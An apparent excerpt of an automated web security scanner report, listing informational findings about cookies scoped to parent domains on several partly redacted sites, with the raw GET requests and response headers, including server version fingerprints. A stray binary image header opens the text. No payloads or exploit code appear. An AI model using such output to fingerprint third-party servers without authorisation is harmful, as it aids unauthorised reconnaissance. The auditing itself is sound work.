GIF89a...................!.......,...........T..;

16.92. http://lifestyle.redacted/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://lifestyle.redacted
Path:	/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

MC1=V=3&GUID=95617ed8b1e0449b8e93c4352fb8c4ef; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
MUID=F82F814B9CA14A8DA8EF5EB7228D86A7; domain=.redacted; expires=Wed, 17-Aug-2011 23:47:11 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: lifestyle.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 23:47:11 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA08
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=95617ed8b1e0449b8e93c4352fb8c4ef; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=F82F814B9CA14A8DA8EF5EB7228D86A7; domain=.redacted; expires=Wed, 17-Aug-2011 23:47:11 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 31456

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="
...[SNIP]...

16.93. http://lifestyle.redacted/relationships/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://lifestyle.redacted
Path:	/relationships/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

MC1=V=3&GUID=ad185c8cd036476ab99f219f50cae67f; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
MUID=4ACBAFEABC3E458D93445CB0BF71AA56; domain=.redacted; expires=Wed, 17-Aug-2011 23:47:17 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /relationships/ HTTP/1.1
Host: lifestyle.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 23:47:17 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA09
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=ad185c8cd036476ab99f219f50cae67f; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=4ACBAFEABC3E458D93445CB0BF71AA56; domain=.redacted; expires=Wed, 17-Aug-2011 23:47:17 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 37451

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="
...[SNIP]...

16.94. http://lifestyle.redacted/relationships/staticslideshowglamour.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://lifestyle.redacted
Path:	/relationships/staticslideshowglamour.aspx

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

MC1=V=3&GUID=3a0a17b7e3454f56a4bcc12d1023d4df; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
MUID=02D6064FB59C4177880821E6DA25C485; domain=.redacted; expires=Wed, 17-Aug-2011 23:47:19 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /relationships/staticslideshowglamour.aspx HTTP/1.1
Host: lifestyle.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 23:47:19 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA13
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=3a0a17b7e3454f56a4bcc12d1023d4df; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=02D6064FB59C4177880821E6DA25C485; domain=.redacted; expires=Wed, 17-Aug-2011 23:47:19 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 34795

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://w
...[SNIP]...

16.95. http://lifestyle.redacted/your-home/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://lifestyle.redacted
Path:	/your-home/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

MC1=V=3&GUID=a62fddde6fef43f48d53312bf038943f; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
MUID=DE365542A27E43F9A2D20EEC313CB20E; domain=.redacted; expires=Thu, 18-Aug-2011 02:09:26 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /your-home/ HTTP/1.1
Host: lifestyle.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 02:09:26 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA10
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=a62fddde6fef43f48d53312bf038943f; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=DE365542A27E43F9A2D20EEC313CB20E; domain=.redacted; expires=Thu, 18-Aug-2011 02:09:26 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 34127

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="
...[SNIP]...

16.96. http://lifestyle.redacted/your-home/room-design/staticslideshowhb.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://lifestyle.redacted
Path:	/your-home/room-design/staticslideshowhb.aspx

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

MC1=V=3&GUID=2d389eb7e7ea4ae0a473db58b1a5758b; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
MUID=42164453E4924CB89C5B977561EA27D0; domain=.redacted; expires=Wed, 17-Aug-2011 23:47:29 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /your-home/room-design/staticslideshowhb.aspx?cp-documentid=26867784&gt1=32067 HTTP/1.1
Host: lifestyle.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

16.97. http://lifestyle.redacted/your-life/family-parenting/article.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://lifestyle.redacted
Path:	/your-life/family-parenting/article.aspx

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

MC1=V=3&GUID=e5a2e16a67154266a9d498fd513a08c5; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
MUID=2588A011AE014923A2AA5BE79447364F; domain=.redacted; expires=Wed, 17-Aug-2011 23:47:25 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /your-life/family-parenting/article.aspx HTTP/1.1
Host: lifestyle.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Date: Sat, 29 Jan 2011 23:47:26 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA12
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Location: http://lifestyle.redacted/your-life/family-parenting/default.aspx
Set-Cookie: MC1=V=3&GUID=e5a2e16a67154266a9d498fd513a08c5; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=2588A011AE014923A2AA5BE79447364F; domain=.redacted; expires=Wed, 17-Aug-2011 23:47:25 GMT; path=/
Cache-Control: no-cache
Content-Length: 0

16.98. http://lifestyle.redacted/your-life/new-year-new-you/video.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://lifestyle.redacted
Path:	/your-life/new-year-new-you/video.aspx

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

MC1=V=3&GUID=a1ed2a58c8c240e8aa192c9ab451625e; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
MUID=1078BE57F6E649E38B580A5D9F01AA70; domain=.redacted; expires=Wed, 17-Aug-2011 23:47:25 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /your-life/new-year-new-you/video.aspx HTTP/1.1
Host: lifestyle.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 23:47:25 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA12
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=a1ed2a58c8c240e8aa192c9ab451625e; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=1078BE57F6E649E38B580A5D9F01AA70; domain=.redacted; expires=Wed, 17-Aug-2011 23:47:25 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 17578

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml"><head><meta http-e
...[SNIP]...

16.99. http://lifestyle.redacted/your-life/your-money-today/article.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://lifestyle.redacted
Path:	/your-life/your-money-today/article.aspx

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

MC1=V=3&GUID=0398126e49724201804ec2ac840e992d; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
MUID=57CE9474CD8C417D817D0DE1275373E2; domain=.redacted; expires=Wed, 17-Aug-2011 23:47:23 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /your-life/your-money-today/article.aspx HTTP/1.1
Host: lifestyle.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Date: Sat, 29 Jan 2011 23:47:23 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA09
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Location: http://lifestyle.redacted/your-life/family-parenting/default.aspx
Set-Cookie: MC1=V=3&GUID=0398126e49724201804ec2ac840e992d; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=57CE9474CD8C417D817D0DE1275373E2; domain=.redacted; expires=Wed, 17-Aug-2011 23:47:23 GMT; path=/
Cache-Control: no-cache
Content-Length: 0

16.100. http://lifestyle.redacted/your-life/your-money-today/video.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://lifestyle.redacted
Path:	/your-life/your-money-today/video.aspx

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

MC1=V=3&GUID=90974142a1fa41e29c7695f2839c0b2b; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
MUID=891F4DE87D9848CF80723C7BDFB3C47D; domain=.redacted; expires=Wed, 17-Aug-2011 23:47:22 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /your-life/your-money-today/video.aspx HTTP/1.1
Host: lifestyle.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 23:47:22 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA14
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=90974142a1fa41e29c7695f2839c0b2b; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=891F4DE87D9848CF80723C7BDFB3C47D; domain=.redacted; expires=Wed, 17-Aug-2011 23:47:22 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 18282

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml"><head><meta http-e
...[SNIP]...

16.101. http://lifestyle.redacted/your-look/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://lifestyle.redacted
Path:	/your-look/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

MC1=V=3&GUID=6dd6fe6121814e1988587a283896d37d; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
MUID=1E75E2518F694A5EA1B2E04278A9FA88; domain=.redacted; expires=Wed, 17-Aug-2011 23:47:11 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /your-look/ HTTP/1.1
Host: lifestyle.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 23:47:11 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA12
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=6dd6fe6121814e1988587a283896d37d; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=1E75E2518F694A5EA1B2E04278A9FA88; domain=.redacted; expires=Wed, 17-Aug-2011 23:47:11 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 36735

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml"><head><meta http-e
...[SNIP]...

16.102. http://lifestyle.redacted/your-look/makeup-skin-care-hair/staticslideshowessence.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://lifestyle.redacted
Path:	/your-look/makeup-skin-care-hair/staticslideshowessence.aspx

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

MC1=V=3&GUID=e4b40a5c5380474087c7ce996b9332b8; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
MUID=D137C55805D5479EA6BDD999E5265BC4; domain=.redacted; expires=Wed, 17-Aug-2011 23:47:13 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /your-look/makeup-skin-care-hair/staticslideshowessence.aspx HTTP/1.1
Host: lifestyle.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 23:47:14 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA10
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=e4b40a5c5380474087c7ce996b9332b8; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=D137C55805D5479EA6BDD999E5265BC4; domain=.redacted; expires=Wed, 17-Aug-2011 23:47:13 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 48583

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://w
...[SNIP]...

16.103. http://lifestyle.redacted/your-look/video/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://lifestyle.redacted
Path:	/your-look/video/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

MC1=V=3&GUID=2ca1bb8bab954b2e8916ae5a5e84634d; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
MUID=A5D1B9B54E4F4F0A904965554C0FDE74; domain=.redacted; expires=Thu, 18-Aug-2011 02:09:20 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /your-look/video/ HTTP/1.1
Host: lifestyle.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 02:09:21 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA14
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=2ca1bb8bab954b2e8916ae5a5e84634d; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=A5D1B9B54E4F4F0A904965554C0FDE74; domain=.redacted; expires=Thu, 18-Aug-2011 02:09:20 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 20440

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="
...[SNIP]...

16.104. http://live.newsvine.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://live.newsvine.com
Path:	/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

vid=a4bc8d41ac71ec541f1bf853a146540d; expires=Sat, 25-Jan-2031 02:08:23 GMT; path=/; domain=.newsvine.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: live.newsvine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 02:08:23 GMT
Server: Apache/2.2.9 (Debian)
Vary: negotiate,Host,Accept-Encoding
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Set-Cookie: vid=a4bc8d41ac71ec541f1bf853a146540d; expires=Sat, 25-Jan-2031 02:08:23 GMT; path=/; domain=.newsvine.com
Content-Length: 0
Content-Type: text/html
Connection: close

16.105. http://local.redacted/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://local.redacted
Path:	/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

MC1=V=3&GUID=8349c3df213b40858bffbf1ed5e320d4; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
MUID=AEB046B1DD804980BD22C1D7DC865D48; domain=.redacted; expires=Wed, 17-Aug-2011 23:47:29 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: local.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

16.106. http://local.redacted/events.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://local.redacted
Path:	/events.aspx

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

MC1=V=3&GUID=0af244c7b84341db94fa63f78ec59843; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
MUID=7CDA6FC0BCE8438688C10A27DAA3A3FA; domain=.redacted; expires=Wed, 17-Aug-2011 23:47:53 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /events.aspx HTTP/1.1
Host: local.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Sat, 29 Jan 2011 23:47:53 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA30
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
STATUS_CODE: NotFound
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=0af244c7b84341db94fa63f78ec59843; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=7CDA6FC0BCE8438688C10A27DAA3A3FA; domain=.redacted; expires=Wed, 17-Aug-2011 23:47:53 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 6288

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta http-e
...[SNIP]...

16.107. http://local.redacted/gas-traffic.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://local.redacted
Path:	/gas-traffic.aspx

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

MC1=V=3&GUID=5b47497cc43743d9be4c3d0002efa31f; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
MUID=72D4472BCF114A3497BE87B9061DAD51; domain=.redacted; expires=Thu, 18-Aug-2011 02:09:28 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /gas-traffic.aspx HTTP/1.1
Host: local.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

16.108. http://local.redacted/hourly.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://local.redacted
Path:	/hourly.aspx

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

MC1=V=3&GUID=fe9b558f11c048c5b0bcfead5c27909c; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
MUID=D700EC8FE6A84E6E86AF10C957726EEB; domain=.redacted; expires=Wed, 17-Aug-2011 23:47:52 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /hourly.aspx HTTP/1.1
Host: local.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

16.109. http://local.redacted/movies-events.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://local.redacted
Path:	/movies-events.aspx

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

MC1=V=3&GUID=362ea74ed69b4e3e91979daf6227ebc5; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
MUID=54E9E8A3E60641D9AC7FE4403046D572; domain=.redacted; expires=Wed, 17-Aug-2011 23:47:43 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /movies-events.aspx HTTP/1.1
Host: local.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

16.110. http://local.redacted/news.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://local.redacted
Path:	/news.aspx

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

MC1=V=3&GUID=3953a7e65afb42b0ade3749d752dcf1c; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
MUID=C14043A1E67E44BCAA9A3B68AA8AFD89; domain=.redacted; expires=Wed, 17-Aug-2011 23:47:29 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /news.aspx HTTP/1.1
Host: local.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

16.111. http://local.redacted/restaurants.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://local.redacted
Path:	/restaurants.aspx

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

MC1=V=3&GUID=11c3bf43b93e4ed9af237f65b02844d7; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
MUID=47142BBDAAA74E00893F20DA82ED8C2E; domain=.redacted; expires=Wed, 17-Aug-2011 23:47:45 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /restaurants.aspx HTTP/1.1
Host: local.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

16.112. http://local.redacted/sports.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://local.redacted
Path:	/sports.aspx

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

MC1=V=3&GUID=d11d2c165e674866abd16c8b8cb9e1bb; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
MUID=A7A43B87D4E04DEA9AC850EC95E92AE2; domain=.redacted; expires=Wed, 17-Aug-2011 23:47:41 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /sports.aspx HTTP/1.1
Host: local.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

16.113. http://local.redacted/ten-day.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://local.redacted
Path:	/ten-day.aspx

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

MC1=V=3&GUID=b091c91e5f57464f867c86a6838b0181; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
MUID=5D4B178CF6734098BD0B688BB765F218; domain=.redacted; expires=Wed, 17-Aug-2011 23:47:49 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ten-day.aspx HTTP/1.1
Host: local.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

16.114. http://local.redacted/weather.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://local.redacted
Path:	/weather.aspx

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

MC1=V=3&GUID=fd5b4d05da194df0bdd44cf8adbd21ef; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
MUID=2B70DCC8FEC94F45B962D0715AF96955; domain=.redacted; expires=Wed, 17-Aug-2011 23:47:33 GMT; path=/

